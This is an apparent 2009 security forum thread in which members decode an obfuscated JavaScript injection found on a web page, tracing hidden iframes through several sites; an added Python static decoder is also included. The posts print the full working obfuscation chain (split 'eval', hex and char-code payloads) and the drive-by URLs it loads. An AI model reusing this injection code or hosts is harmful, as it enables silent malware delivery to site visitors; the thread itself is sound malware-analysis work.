Topic: Decode Urgent Help Needed
Dark_Knight (Sr. Member, 292 posts)
« on: July 24, 2009, 05:54:14 PM »

I need some help here. Anybody have an idea what this does?
3364253334253337253330253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c26z3d+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c26z3d+'2536642536352533652729293B7D7661'+c26z3d+'72206D796961'+c26z3d+'3D747275653B3C2F7363726970743E';r5bb5e1df0.write(r3a5450e3d81(reeaa475ea65));

How could I decode this?

CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
alan (Newbie, 48 posts)
« Reply #1 on: July 24, 2009, 06:27:47 PM »

How far have you gotten?

Putting this portion into

3D747275653B3C2F7363726970743E

hex 2 ASCII gives

=true;</script>

which looks reasonable! But I get stuck there!
Dark_Knight (Sr. Member, 292 posts)
« Reply #2 on: July 24, 2009, 06:29:50 PM »

I initially tried the hex to ASCII but had no luck. I will give it another shot.

CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
alan (Newbie, 48 posts)
« Reply #3 on: July 24, 2009, 06:57:11 PM »

I think you could be missing a good portion of it. I've sent you a private message which may or may not be relevant.
Jhaddix (Sr. Member, 317 posts)
« Reply #4 on: July 24, 2009, 06:58:44 PM »

By first impressions I'd say it's an XSS attack... a full decode would be required.

Dark_Knight (Sr. Member, 292 posts)
« Reply #5 on: July 24, 2009, 07:01:38 PM »

Thanks for all the help guys. I appreciate it.

CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
Ketchup (Hero Member, 1021 posts)
« Reply #6 on: July 24, 2009, 07:59:09 PM »

The rough translation is this:

Code:
style='visibility:hidden'></iframe>'));}var myia=true;</script>r5bb5e1df0.write(r3a5450e3d81(reeaa475ea65));

You are indeed missing a good portion of it.  I would agree with Jhaddix in that it is likely part of an XSS attack.

~~~~~~~~~~~~~~
Ketchup
UNIX (Hero Member, 1235 posts)
« Reply #7 on: July 24, 2009, 11:58:48 PM »

I too would say that a part is missing. Do you have the rest of it or were you just asking to get an idea what this could be?
Jhaddix (Sr. Member, 317 posts)
« Reply #8 on: July 25, 2009, 01:31:17 AM »

Ketchup's decode makes me think it's a clickjacking attack, injected via XSS.


Dark_Knight (Sr. Member, 292 posts)
« Reply #9 on: July 25, 2009, 09:27:05 AM »

<script>c26z634='';r28bd46b6=document;r28bd46b6.write('<scr'+'ipt>function r4373bbe(r52973acb7a){return ev'+c26z634+'al(r52973acb7a); }</scr'+'ipt>');  function c26e34eb22refb13(re3c3827f47){ function r8157f3fa362(){var r99011=16;return r99011;} var zf4='';return (r4373bbe('parseI'+zf4+'nt')(re3c3827f47,r8157f3fa362()));}function r3cf3d(rcba5aab2){ function r2554044(){var rc0ee24fd3=2;return rc0ee24fd3;} var r3ff7d7403c7='';r17e8d5766='fromCh';r26431=String[r17e8d5766+'arCode'];for(r7bb6b022=0;r7bb6b022<rcba5aab2.length;r7bb6b022+=r2554044()){ r3ff7d7403c7+=(r26431(c26e34eb22refb13(rcba5aab2.substr(r7bb6b022,r2554044()))));}return r3ff7d7403c7;} var r6671d26afb='3C7363726970743E69662821'+c26z634+'6D796961'+c26z634+'297B646F63756D656E742E777269746528756E65736361'+c26z634+'7065282027253363253639253636253732253631'+c26z634+'253664253635253230253665253631'+c26z634+'253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361'+c26z634+'253266253266253737253737253737253265253631'+c26z634+'253732253665253638253635253664253264253634253639253631'+c26z634+'253664253631'+c26z634+'253665253734253265253665253663253266253366253237253262253464253631'+c26z634+'253734253638253265253732253666253735253665253634253238253464253631'+c26z634+'253734253638253265253732253631'+c26z634+'253665253634253666253664253238253239253261'+c26z634+'253331'+c26z634+'253330253339253339253330253338253239253262253237253330253635253339253332253335253632253237253230253737253639253634253734253638253364253336253333253339253230253638253635253639253637253638253734253364253331'+c26z634+'253337253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c26z634+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c26z634+'2536642536352533652729293B7D7661'+c26z634+'72206D796961'+c26z634+'3D747275653B3C2F7363726970743E';r28bd46b6.write(r3cf3d(r6671d26afb));</script><script>check_content()</script>

<script>if(!myia){document.write(unescape
<iframe name=c26 src='hxxp://www.arnhem-diamant.nl/?'+Math.round(Math.random()*109908)+'0e925b' width=639 height=1 c72 style='visibility:hidden'></iframe>      
=true;</script>
));}va

That's what I have so far. Apparently they go from hex 2 ASCII and then ASCII to binary.

CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
Ketchup (Hero Member, 1021 posts)
« Reply #10 on: July 25, 2009, 10:17:06 AM »

Well, they are obscuring the code a bit.  It's pretty common for goofy variable and function names to be used, like r58ss8a2, for example.  I cleaned up the code a little bit.  It looks like you are still missing some portion of it, although I doubt it is necessary.   The attack vector looks like a hidden IFRAME.

Code:
<script>

spacer='';
doc=document;
doc.write('<scr'+'ipt>function unknown_function1(unknown_var1){return ev'+spacer+'al(unknown_var1); }</scr'+'ipt>');


function function1(func1_arg1)
{

  function setvar1()
  {
    var var1=16;
    return var1;
  }
  var spacer2='';
  return (unknown_function1('parseI'+spacer2+'nt')(func1_arg1,setvar1()));
}

function function2(func2_arg1)
{
  function setvar2()
  {
    var var2=2;
    return var2;
  }
  var return_string='';
  string1='fromCh';
  string2=String[string1+'arCode'];
  for(i=0;i<func2_arg1.length;i+=setvar2())
  {
    return_string+=(string2(function1(func2_arg1.substr(i,setvar2()))));
  }
  return return_string;
}

var attack_vector='3C7363726970743E69662821'+spacer+'6D796961'+spacer+'297B646F63756D656E742E777269746528756E65736361'+spacer+'7065282027253363253639253636253732253631'+spacer+'253664253635253230253665253631'+spacer+'253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361'+spacer+'253266253266253737253737253737253265253631'+spacer+'253732253665253638253635253664253264253634253639253631'+spacer+'253664253631'+spacer+'253665253734253265253665253663253266253366253237253262253464253631'+spacer+'253734253638253265253732253666253735253665253634253238253464253631'+spacer+'253734253638253265253732253631'+spacer+'253665253634253666253664253238253239253261'+spacer+'253331'+spacer+'253330253339253339253330253338253239253262253237253330253635253339253332253335253632253237253230253737253639253634253734253638253364253336253333253339253230253638253635253639253637253638253734253364253331'+spacer+'253337253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+spacer+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+spacer+'2536642536352533652729293B7D7661'+spacer+'72206D796961'+spacer+'3D747275653B3C2F7363726970743E';

<!-- ***** The above attack_vector variable translates to the following: ***** -->
<!-- ***** This was added by ketchup ***** -->
<script>
if(!myia)
{
  document.write(unescape( "'<iframe name=c26 src='http://www.arnhem-diamant.nl/?'+Math.round(Math.random()*109908)+'0e925b' width=639 height=172 style='visibility:hidden'></iframe>'"));
}
var myia=true;
</script>
<!-- ***** end translation of attack_vector variable ***** -->



<!-- ********* here is where it appears they write the attack vector *********** -->
document.write(function2(attack_vector));

</script>

<script>
  check_content()
</script>

~~~~~~~~~~~~~~
Ketchup
Dark_Knight (Sr. Member, 292 posts)
« Reply #11 on: July 25, 2009, 10:22:13 AM »

Guys, the help is GREATLY appreciated. So this looks like an XSS attack maybe, as mentioned previously?

CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
Ketchup (Hero Member, 1021 posts)
« Reply #12 on: July 25, 2009, 10:35:55 AM »

Yep, I am not sure exactly what that link is doing, but I am not brave enough to find out :)

~~~~~~~~~~~~~~
Ketchup
Ketchup (Hero Member, 1021 posts)
« Reply #13 on: July 25, 2009, 11:15:20 AM »

Here is what I pulled from the site referenced in the script.  I took the liberty of translating some of the code to make it more readable.   

This is interesting.  I will let you know if I find anything else.

Code:
<!-- ad -->
<script type="text/javascript">
var filler1 = "lRusrktXDJJYrvSgerej";
var filler2 = "OsFFoXlSOQCXadLJskRb";
var filler3 = "jEfJhqTablBNAwUHCnrO";

var shellcode? = "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34z32z104z101z105z103z104z116z61z34z54z48z34z32z115z114z99z61z34z104z116z116z112z58z47z47z119z119z119z46z103z97z114z100z101z110z45z97z114z116z46z103z114z47z34z32z115z116z121z108z101z61z34z98z111z114z100z101z114z58z48z112z120z59z32z112z111z115z105z116z105z111z110z58z114z101z108z97z116z105z118z101z59z32z116z111z112z58z48z112z120z59z32z108z101z102z116z58z45z53z48z48z112z120z59z32z111z112z97z99z105z116z121z58z48z59z32z102z105z108z116z101z114z58z112z114z111z103z105z100z58z68z88z73z109z97z103z101z84z114z97z110z115z102z111z114z109z46z77z105z99z114z111z115z111z102z116z46z65z108z112z104z97z40z111z112z97z99z105z116z121z61z48z41z59z32z45z109z111z122z45z111z112z97z99z105z116z121z58z48z34z62z60z47z105z102z114z97z109z101z62";

var filler4 = "mgpmcKufxlumukVYGnvu";
var filler5 = "FyzziVYoJTjQuBufAdRA";
var filler6 = "cUHXVBCVfUWXBJKmVWmB";

var array_var1 = shellcode?.split("z");

var filler7 = "EMwGVHsrdesOdfMoCHhk";
var filler8 = "sQVVvhKypribJcOSEVUP";
var filler9 = "gaVqDjIHFcWYXCCoEMiV";

var string_var1 = "";

var filler10 = "GmndopStCBOxlsqrCdDA";
var filler11 = "jWjVPaMREQRNXxbGzyyf";
var filler12 = "zAvXyXdyVbdHfvSeerMv";

for (var i=1; i<array_var1.length; i++)
{
  string_var1+=String.fromCharCode(array_var1[i]);
}
try
{
  document.write(string_var1);
}
catch(e)
{
}

var filler13 = "cEtIzLmeDzZbgWDQoxfq";
var filler14 = "nQFUmJkbGQRhsImNXTyo";
var filler15 = "fosYxelUyjIaDpPnYRyu";

</script>
<!-- /ad -->
</body></html>

<script>check_content()</script>

~~~~~~~~~~~~~~
Ketchup
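A static decoder for the two layers discussed in this thread, added here as an example and not code from the thread or from Ketchup: the hex-pair literal with '+c26z634+' joins and its inner unescape() layer from Reply #10, and the 'z'-separated decimal char codes from Reply #13. The sample literals are constructed (they decode to an iframe pointing at the placeholder host x.invalid); only the document.write(unescape( ' prefix of the hex sample is copied from the posted script.

```python
import re
from urllib.parse import unquote

# Added example, not code from the thread. Everything here is a static
# transform: nothing from a sample is ever eval'd or written into a DOM.

# Joins like '+c26z634+' (any identifier) that split the hex literal in Reply #10.
_JOIN = re.compile(r"'\s*\+\s*[A-Za-z_$][\w$]*\s*\+\s*'")

def decode_hex_layer(literal: str) -> str:
    """Undo function2(): drop the joins, read each 2-char hex group as a
    char code (parseInt(x, 16) + String.fromCharCode), return the inner JS."""
    hexstr = _JOIN.sub("", literal.strip("'"))
    if len(hexstr) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", hexstr):
        raise ValueError("literal is not a clean run of hex pairs")
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))

def unescape_payloads(js: str) -> list:
    """Plaintext of every unescape('...') argument in the decoded JS; the
    posted script hides the <iframe> markup behind this second layer."""
    return [unquote(m) for m in re.findall(r"unescape\(\s*'([^']*)'\s*\)", js)]

def decode_z_layer(blob: str) -> str:
    """Undo the split('z') + fromCharCode loop from Reply #13 (it starts at
    index 1 because the leading 'z' yields an empty first element)."""
    parts = blob.split("z")
    if parts[0] != "":
        raise ValueError("expected the blob to start with the 'z' separator")
    return "".join(chr(int(p)) for p in parts[1:])

def iframe_srcs(html: str) -> list:
    """The src of every <iframe> in decoded markup (case-insensitive)."""
    return re.findall(r"<iframe[^>]*\ssrc=['\"]([^'\"]+)['\"]", html, re.I)

# Constructed samples: the first two hex segments are the
# document.write(unescape( ' prefix from the posted script; the rest
# encodes a minimal iframe whose src is the placeholder host x.invalid.
SAMPLE_HEX = ("'646F63756D656E742E777269746528756E65736361'+c26z634+'7065282027"
              "253363253639253636253732253631'+c26z634+'253664253635"
              "253230253733253732253633253364253237687474703A2F2F782E696E76616C69642F"
              "253237253365272929'")
SAMPLE_Z = ("z60z105z102z114z97z109z101z32z115z114z99z61z34z104z116z116z112z58z47z47"
            "z120z46z105z110z118z97z108z105z100z47z34z62z60z47z105z102z114z97z109z101z62")

if __name__ == "__main__":
    js = decode_hex_layer(SAMPLE_HEX)
    print(js)  # the inner document.write(unescape( '%3c...%3e')) call
    for payload in unescape_payloads(js):
        print(payload, iframe_srcs(payload))  # <iframe src='http://x.invalid/'> ['http://x.invalid/']
    print(decode_z_layer(SAMPLE_Z), iframe_srcs(decode_z_layer(SAMPLE_Z)))
```

Because the decoder never executes the sample, it can be run on a captured page safely; the decoded src values are what an analyst would block or hunt for in proxy logs.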
Ketchup (Hero Member, 1021 posts)
« Reply #14 on: July 25, 2009, 11:33:58 AM »

LOL, that's not shellcode.  I was over-analyzing it.   It's just another iframe:

Code:
<iframe width="480" height="60" src="http://www.garden-art.gr/" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

I traced it through a couple of more sites, and I am stuck here:

Code:
<iframe width="480" height="60" src="http://ddosguard.info/vsetakoe/?96d440414dfad88fe5c6de195a254e50" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

The hash value being passed to that URL seems to be some sort of authentication hash (md5).  I am guessing this one is either not valid or is disabled because I am not getting anything from this page.  If you alter the parameter or delete it, you get plain text on the page that resembles BASE64 encoding.  The BASE64 text varies depending on how you alter the parameter.   It doesn't appear to translate to anything readable, at least not in English.

« Last Edit: July 25, 2009, 12:12:49 PM by Ketchup »

~~~~~~~~~~~~~~
Ketchup